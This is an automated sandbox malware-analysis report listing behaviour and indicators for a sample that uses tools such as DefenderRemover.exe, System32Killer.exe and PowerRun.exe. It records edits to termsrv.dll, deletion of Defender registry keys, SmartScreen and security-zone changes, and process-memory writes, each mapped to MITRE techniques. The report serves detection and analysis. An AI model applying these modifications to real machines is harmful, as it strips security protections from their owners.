File opened for modification	C:\Windows\System32\it-IT\rdrleakdiag.exe.mui	cmd.exe
File opened for modification	C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Appx\Appx.format.ps1xml	cmd.exe
File opened for modification	C:\Windows\System32\de-DE\ssdpsrv.dll.mui	cmd.exe
File opened for modification	C:\Windows\System32\services.msc	System32Killer.exe
File opened for modification	C:\Windows\system32\DriverStore\en-US\iai2c.inf_loc	cmd.exe
File opened for modification	C:\Windows\system32\ja-jp\RADCUI.dll.mui	cmd.exe
File opened for modification	C:\Windows\System32\wbem\scrcons.mof	System32Killer.exe
File opened for modification	C:\Windows\System32\fde.dll	cmd.exe
File opened for modification	C:\Windows\System32\ja-jp\gpresult.exe.mui	cmd.exe

Modifies termsrv.dll 1 TTPs 4 IoCs

Commonly used to allow simultaneous RDP sessions.

Remote Desktop Protocol

T1021.001

description	ioc	Process
File opened for modification	C:\Windows\system32\termsrv.dll	cmd.exe
File opened for modification	C:\Windows\System32\termsrv.dll	cmd.exe
File opened for modification	C:\Windows\System32\termsrv.dll	cmd.exe
File opened for modification	C:\Windows\System32\termsrv.dll	System32Killer.exe

Drops file in Windows directory 2 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Logs\DISM\dism.log	powershell.exe
File opened for modification	C:\Windows\Logs\DISM\dism.log	dismhost.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 18 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	regedit.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	regedit.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	regedit.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	regedit.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	DefenderRemover.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	regedit.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	regedit.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	regedit.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	regedit.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	regedit.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	regedit.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	regedit.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	choice.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	regedit.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	regedit.exe

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
1968	timeout.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Modifies data under HKEY_USERS 64 IoCs

description	ioc	Process
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	PowerRun.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	PowerRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	PowerRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	PowerRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	PowerRun.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	PowerRun.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	PowerRun.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	PowerRun.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	PowerRun.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	PowerRun.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	PowerRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	PowerRun.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	PowerRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	PowerRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	PowerRun.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	PowerRun.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	PowerRun.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	PowerRun.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	PowerRun.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	PowerRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	PowerRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	PowerRun.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	PowerRun.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	PowerRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	PowerRun.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	PowerRun.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	PowerRun.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	PowerRun.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	PowerRun.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	PowerRun.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	PowerRun.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	PowerRun.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	PowerRun.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	PowerRun.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	PowerRun.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	PowerRun.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	PowerRun.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	PowerRun.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	PowerRun.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	PowerRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	PowerRun.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	PowerRun.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Control Panel\Desktop\LowLevelHooksTimeout = "1"	regedit.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Edge\SmartScreenEnabled\ = "0"	regedit.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	PowerRun.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	PowerRun.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	PowerRun.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	PowerRun.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	PowerRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	PowerRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	PowerRun.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	PowerRun.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	PowerRun.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	PowerRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	PowerRun.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	PowerRun.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	PowerRun.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	PowerRun.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	PowerRun.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	PowerRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	PowerRun.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Control Panel\Desktop\HungAppTimeout = "1000"	regedit.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	PowerRun.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	PowerRun.exe

Modifies registry class 26 IoCs

description	ioc	Process
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{BB64F8A7-BEE7-4E1A-AB8D-7D8273F7FDB6}\Instance\InitPropertyBag	regedit.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{E48B2549-D510-4A76-8A5F-FC126A6215F0}\InprocServer32	regedit.exe
Key deleted	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\AppX9kvz3rdv8t7twanaezbwfcdgrbg3bck0\Shell\open\command	regedit.exe
Key deleted	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\AppX9kvz3rdv8t7twanaezbwfcdgrbg3bck0\Shell	regedit.exe
Key deleted	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\ms-cxh	regedit.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{BB64F8A7-BEE7-4E1A-AB8D-7D8273F7FDB6}\Instance	regedit.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{BB64F8A7-BEE7-4E1A-AB8D-7D8273F7FDB6}\ShellFolder	regedit.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\AppUserModelId\Microsoft.Windows.Defender	regedit.exe
Key deleted	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\AppX9kvz3rdv8t7twanaezbwfcdgrbg3bck0\Application	regedit.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{BB64F8A7-BEE7-4E1A-AB8D-7D8273F7FDB6}\ShellFolder	regedit.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{BB64F8A7-BEE7-4E1A-AB8D-7D8273F7FDB6}\InProcServer32	regedit.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{BB64F8A7-BEE7-4E1A-AB8D-7D8273F7FDB6}\InProcServer32	regedit.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{BB64F8A7-BEE7-4E1A-AB8D-7D8273F7FDB6}\Instance	regedit.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{BB64F8A7-BEE7-4E1A-AB8D-7D8273F7FDB6}	regedit.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{BB64F8A7-BEE7-4E1A-AB8D-7D8273F7FDB6}\DefaultIcon	regedit.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\AppUserModelId\Windows.Defender	regedit.exe
Key deleted	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\AppX9kvz3rdv8t7twanaezbwfcdgrbg3bck0\DefaultIcon	regedit.exe
Key deleted	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\AppX9kvz3rdv8t7twanaezbwfcdgrbg3bck0\Shell\open	regedit.exe
Key deleted	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\AppX9kvz3rdv8t7twanaezbwfcdgrbg3bck0	regedit.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{BB64F8A7-BEE7-4E1A-AB8D-7D8273F7FDB6}\Instance\InitPropertyBag	regedit.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{BB64F8A7-BEE7-4E1A-AB8D-7D8273F7FDB6}\DefaultIcon	regedit.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{BB64F8A7-BEE7-4E1A-AB8D-7D8273F7FDB6}	regedit.exe
Key created	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\Local Settings	chrome.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{E48B2549-D510-4A76-8A5F-FC126A6215F0}\InprocServer32	regedit.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{E48B2549-D510-4A76-8A5F-FC126A6215F0}	regedit.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{E48B2549-D510-4A76-8A5F-FC126A6215F0}	regedit.exe

Runs .reg file with regedit 42 IoCs

pid	Process
516	regedit.exe
3672	regedit.exe
796	regedit.exe
928	regedit.exe
1324	regedit.exe
3360	regedit.exe
2052	regedit.exe
2544	regedit.exe
3900	regedit.exe
2740	regedit.exe
3632	regedit.exe
1300	regedit.exe
3672	regedit.exe
2520	regedit.exe
1952	regedit.exe
3472	regedit.exe
3672	regedit.exe
3468	regedit.exe
316	regedit.exe
2120	regedit.exe
4936	regedit.exe
2904	regedit.exe
752	regedit.exe
2200	regedit.exe
3600	regedit.exe
3752	regedit.exe
2364	regedit.exe
2992	regedit.exe
4460	regedit.exe
4460	regedit.exe
1340	regedit.exe
5076	regedit.exe
4964	regedit.exe
512	regedit.exe
3852	regedit.exe
4668	regedit.exe
3116	regedit.exe
4428	regedit.exe
2120	regedit.exe
2140	regedit.exe
3096	regedit.exe
3524	regedit.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2168	chrome.exe
2168	chrome.exe
3356	chrome.exe
3356	chrome.exe
3356	chrome.exe
3356	chrome.exe
1232	powershell.exe
1232	powershell.exe
4344	powershell.exe
3128	PowerRun.exe
3128	PowerRun.exe
3128	PowerRun.exe
3128	PowerRun.exe
4344	powershell.exe
3228	PowerRun.exe
3228	PowerRun.exe
728	PowerRun.exe
728	PowerRun.exe
728	PowerRun.exe
728	PowerRun.exe
3228	PowerRun.exe
3228	PowerRun.exe
1600	PowerRun.exe
1600	PowerRun.exe
4396	PowerRun.exe
4396	PowerRun.exe
1600	PowerRun.exe
1600	PowerRun.exe
4396	PowerRun.exe
4396	PowerRun.exe
4060	PowerRun.exe
4060	PowerRun.exe
4060	PowerRun.exe
4060	PowerRun.exe
1704	PowerRun.exe
1704	PowerRun.exe
1704	PowerRun.exe
1704	PowerRun.exe
4132	PowerRun.exe
4132	PowerRun.exe
4132	PowerRun.exe
4132	PowerRun.exe
1160	PowerRun.exe
1160	PowerRun.exe
1160	PowerRun.exe
1160	PowerRun.exe
4712	PowerRun.exe
4712	PowerRun.exe
4712	PowerRun.exe
4712	PowerRun.exe
4436	PowerRun.exe
4436	PowerRun.exe
4436	PowerRun.exe
4436	PowerRun.exe
892	PowerRun.exe
892	PowerRun.exe
892	PowerRun.exe
892	PowerRun.exe
1616	PowerRun.exe
1616	PowerRun.exe
1616	PowerRun.exe
1616	PowerRun.exe
2512	PowerRun.exe
2512	PowerRun.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 15 IoCs

pid	Process
2168	chrome.exe
2168	chrome.exe
2168	chrome.exe
2168	chrome.exe
2168	chrome.exe
2168	chrome.exe
2168	chrome.exe
2168	chrome.exe
2168	chrome.exe
2168	chrome.exe
2168	chrome.exe
2168	chrome.exe
2168	chrome.exe
2168	chrome.exe
2168	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	2168	chrome.exe
Token: SeCreatePagefilePrivilege	2168	chrome.exe
Token: SeShutdownPrivilege	2168	chrome.exe
Token: SeCreatePagefilePrivilege	2168	chrome.exe
Token: SeShutdownPrivilege	2168	chrome.exe
Token: SeCreatePagefilePrivilege	2168	chrome.exe
Token: SeShutdownPrivilege	2168	chrome.exe
Token: SeCreatePagefilePrivilege	2168	chrome.exe
Token: SeShutdownPrivilege	2168	chrome.exe
Token: SeCreatePagefilePrivilege	2168	chrome.exe
Token: SeShutdownPrivilege	2168	chrome.exe
Token: SeCreatePagefilePrivilege	2168	chrome.exe
Token: SeShutdownPrivilege	2168	chrome.exe
Token: SeCreatePagefilePrivilege	2168	chrome.exe
Token: SeShutdownPrivilege	2168	chrome.exe
Token: SeCreatePagefilePrivilege	2168	chrome.exe
Token: SeShutdownPrivilege	2168	chrome.exe
Token: SeCreatePagefilePrivilege	2168	chrome.exe
Token: SeShutdownPrivilege	2168	chrome.exe
Token: SeCreatePagefilePrivilege	2168	chrome.exe
Token: SeShutdownPrivilege	2168	chrome.exe
Token: SeCreatePagefilePrivilege	2168	chrome.exe
Token: SeShutdownPrivilege	2168	chrome.exe
Token: SeCreatePagefilePrivilege	2168	chrome.exe
Token: SeShutdownPrivilege	2168	chrome.exe
Token: SeCreatePagefilePrivilege	2168	chrome.exe
Token: SeShutdownPrivilege	2168	chrome.exe
Token: SeCreatePagefilePrivilege	2168	chrome.exe
Token: SeShutdownPrivilege	2168	chrome.exe
Token: SeCreatePagefilePrivilege	2168	chrome.exe
Token: SeShutdownPrivilege	2168	chrome.exe
Token: SeCreatePagefilePrivilege	2168	chrome.exe
Token: SeShutdownPrivilege	2168	chrome.exe
Token: SeCreatePagefilePrivilege	2168	chrome.exe
Token: SeShutdownPrivilege	2168	chrome.exe
Token: SeCreatePagefilePrivilege	2168	chrome.exe
Token: SeShutdownPrivilege	2168	chrome.exe
Token: SeCreatePagefilePrivilege	2168	chrome.exe
Token: SeShutdownPrivilege	2168	chrome.exe
Token: SeCreatePagefilePrivilege	2168	chrome.exe
Token: SeShutdownPrivilege	2168	chrome.exe
Token: SeCreatePagefilePrivilege	2168	chrome.exe
Token: SeShutdownPrivilege	2168	chrome.exe
Token: SeCreatePagefilePrivilege	2168	chrome.exe
Token: SeShutdownPrivilege	2168	chrome.exe
Token: SeCreatePagefilePrivilege	2168	chrome.exe
Token: SeShutdownPrivilege	2168	chrome.exe
Token: SeCreatePagefilePrivilege	2168	chrome.exe
Token: SeShutdownPrivilege	2168	chrome.exe
Token: SeCreatePagefilePrivilege	2168	chrome.exe
Token: SeShutdownPrivilege	2168	chrome.exe
Token: SeCreatePagefilePrivilege	2168	chrome.exe
Token: SeShutdownPrivilege	2168	chrome.exe
Token: SeCreatePagefilePrivilege	2168	chrome.exe
Token: SeShutdownPrivilege	2168	chrome.exe
Token: SeCreatePagefilePrivilege	2168	chrome.exe
Token: SeShutdownPrivilege	2168	chrome.exe
Token: SeCreatePagefilePrivilege	2168	chrome.exe
Token: SeShutdownPrivilege	2168	chrome.exe
Token: SeCreatePagefilePrivilege	2168	chrome.exe
Token: SeShutdownPrivilege	2168	chrome.exe
Token: SeCreatePagefilePrivilege	2168	chrome.exe
Token: SeShutdownPrivilege	2168	chrome.exe
Token: SeCreatePagefilePrivilege	2168	chrome.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
2168	chrome.exe
2168	chrome.exe
2168	chrome.exe
2168	chrome.exe
2168	chrome.exe
2168	chrome.exe
2168	chrome.exe
2168	chrome.exe
2168	chrome.exe
2168	chrome.exe
2168	chrome.exe
2168	chrome.exe
2168	chrome.exe
2168	chrome.exe
2168	chrome.exe
2168	chrome.exe
2168	chrome.exe
2168	chrome.exe
2168	chrome.exe
2168	chrome.exe
2168	chrome.exe
2168	chrome.exe
2168	chrome.exe
2168	chrome.exe
2168	chrome.exe
2168	chrome.exe
2168	chrome.exe
2168	chrome.exe
2168	chrome.exe
2168	chrome.exe
2168	chrome.exe
2168	chrome.exe
2168	chrome.exe
2168	chrome.exe
2168	chrome.exe
2168	chrome.exe
2168	chrome.exe
2168	chrome.exe
2168	chrome.exe
2168	chrome.exe
2168	chrome.exe
2168	chrome.exe
2168	chrome.exe
2168	chrome.exe
2168	chrome.exe
2168	chrome.exe
2168	chrome.exe
2168	chrome.exe
2168	chrome.exe
2168	chrome.exe
2168	chrome.exe
2168	chrome.exe
2168	chrome.exe
2168	chrome.exe
2168	chrome.exe
2168	chrome.exe
2168	chrome.exe
2168	chrome.exe
2168	chrome.exe
2168	chrome.exe
2168	chrome.exe
2168	chrome.exe
2168	chrome.exe
2168	chrome.exe

Suspicious use of SendNotifyMessage 26 IoCs

pid	Process
2168	chrome.exe
2168	chrome.exe
2168	chrome.exe
2168	chrome.exe
2168	chrome.exe
2168	chrome.exe
2168	chrome.exe
2168	chrome.exe
2168	chrome.exe
2168	chrome.exe
2168	chrome.exe
2168	chrome.exe
2168	chrome.exe
2168	chrome.exe
2168	chrome.exe
2168	chrome.exe
2168	chrome.exe
2168	chrome.exe
2168	chrome.exe
2168	chrome.exe
2168	chrome.exe
2168	chrome.exe
2168	chrome.exe
2168	chrome.exe
2168	chrome.exe
2168	chrome.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2168 wrote to memory of 4716	2168	chrome.exe	101
PID 2168 wrote to memory of 4716	2168	chrome.exe	101
PID 2168 wrote to memory of 2284	2168	chrome.exe	102
PID 2168 wrote to memory of 2284	2168	chrome.exe	102
PID 2168 wrote to memory of 2284	2168	chrome.exe	102
PID 2168 wrote to memory of 2284	2168	chrome.exe	102
PID 2168 wrote to memory of 2284	2168	chrome.exe	102
PID 2168 wrote to memory of 2284	2168	chrome.exe	102
PID 2168 wrote to memory of 2284	2168	chrome.exe	102
PID 2168 wrote to memory of 2284	2168	chrome.exe	102
PID 2168 wrote to memory of 2284	2168	chrome.exe	102
PID 2168 wrote to memory of 2284	2168	chrome.exe	102
PID 2168 wrote to memory of 2284	2168	chrome.exe	102
PID 2168 wrote to memory of 2284	2168	chrome.exe	102
PID 2168 wrote to memory of 2284	2168	chrome.exe	102
PID 2168 wrote to memory of 2284	2168	chrome.exe	102
PID 2168 wrote to memory of 2284	2168	chrome.exe	102
PID 2168 wrote to memory of 2284	2168	chrome.exe	102
PID 2168 wrote to memory of 2284	2168	chrome.exe	102
PID 2168 wrote to memory of 2284	2168	chrome.exe	102
PID 2168 wrote to memory of 2284	2168	chrome.exe	102
PID 2168 wrote to memory of 2284	2168	chrome.exe	102
PID 2168 wrote to memory of 2284	2168	chrome.exe	102
PID 2168 wrote to memory of 2284	2168	chrome.exe	102
PID 2168 wrote to memory of 2284	2168	chrome.exe	102
PID 2168 wrote to memory of 2284	2168	chrome.exe	102
PID 2168 wrote to memory of 2284	2168	chrome.exe	102
PID 2168 wrote to memory of 2284	2168	chrome.exe	102
PID 2168 wrote to memory of 2284	2168	chrome.exe	102
PID 2168 wrote to memory of 2284	2168	chrome.exe	102
PID 2168 wrote to memory of 2284	2168	chrome.exe	102
PID 2168 wrote to memory of 2284	2168	chrome.exe	102
PID 2168 wrote to memory of 2624	2168	chrome.exe	103
PID 2168 wrote to memory of 2624	2168	chrome.exe	103
PID 2168 wrote to memory of 2496	2168	chrome.exe	104
PID 2168 wrote to memory of 2496	2168	chrome.exe	104
PID 2168 wrote to memory of 2496	2168	chrome.exe	104
PID 2168 wrote to memory of 2496	2168	chrome.exe	104
PID 2168 wrote to memory of 2496	2168	chrome.exe	104
PID 2168 wrote to memory of 2496	2168	chrome.exe	104
PID 2168 wrote to memory of 2496	2168	chrome.exe	104
PID 2168 wrote to memory of 2496	2168	chrome.exe	104
PID 2168 wrote to memory of 2496	2168	chrome.exe	104
PID 2168 wrote to memory of 2496	2168	chrome.exe	104
PID 2168 wrote to memory of 2496	2168	chrome.exe	104
PID 2168 wrote to memory of 2496	2168	chrome.exe	104
PID 2168 wrote to memory of 2496	2168	chrome.exe	104
PID 2168 wrote to memory of 2496	2168	chrome.exe	104
PID 2168 wrote to memory of 2496	2168	chrome.exe	104
PID 2168 wrote to memory of 2496	2168	chrome.exe	104
PID 2168 wrote to memory of 2496	2168	chrome.exe	104
PID 2168 wrote to memory of 2496	2168	chrome.exe	104
PID 2168 wrote to memory of 2496	2168	chrome.exe	104
PID 2168 wrote to memory of 2496	2168	chrome.exe	104
PID 2168 wrote to memory of 2496	2168	chrome.exe	104
PID 2168 wrote to memory of 2496	2168	chrome.exe	104
